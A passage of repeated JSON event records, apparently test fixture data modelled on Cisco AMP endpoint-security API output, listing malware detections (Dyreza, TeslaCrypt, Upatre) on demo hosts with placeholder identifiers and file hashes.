Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259286289612895","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259234750005000,"timestamp":1610705893,"timestamp_nanoseconds":657000000,"date":"2021-01-15T10:18:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259234750005342","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259183210398000,"timestamp":1610705881,"timestamp_nanoseconds":645000000,"date":"2021-01-15T10:18:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259183210397789","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180335966167761000,"timestamp":1610705878,"timestamp_nanoseconds":875000000,"date":"2021-01-15T10:17:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6180335966167760897","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":672000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":653000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":260000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259135965757000,"timestamp":1610705870,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259135965757532","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900291000600,"timestamp":1610705861,"timestamp_nanoseconds":291000000,"date":"2021-01-15T10:17:41+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705861,"start_date":"2021-01-15T10:17:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251520740131000,"timestamp":1610705860,"timestamp_nanoseconds":3000000,"date":"2021-01-15T10:17:40+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251520740130915","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":988000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163618","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":988000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163617","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":894000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163616","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":894000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163615","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":894000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163614","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":878000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163613","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":878000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163612","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":863000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163611","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":863000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163610","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":816000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163609","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":738000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163608","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":722000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":722000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 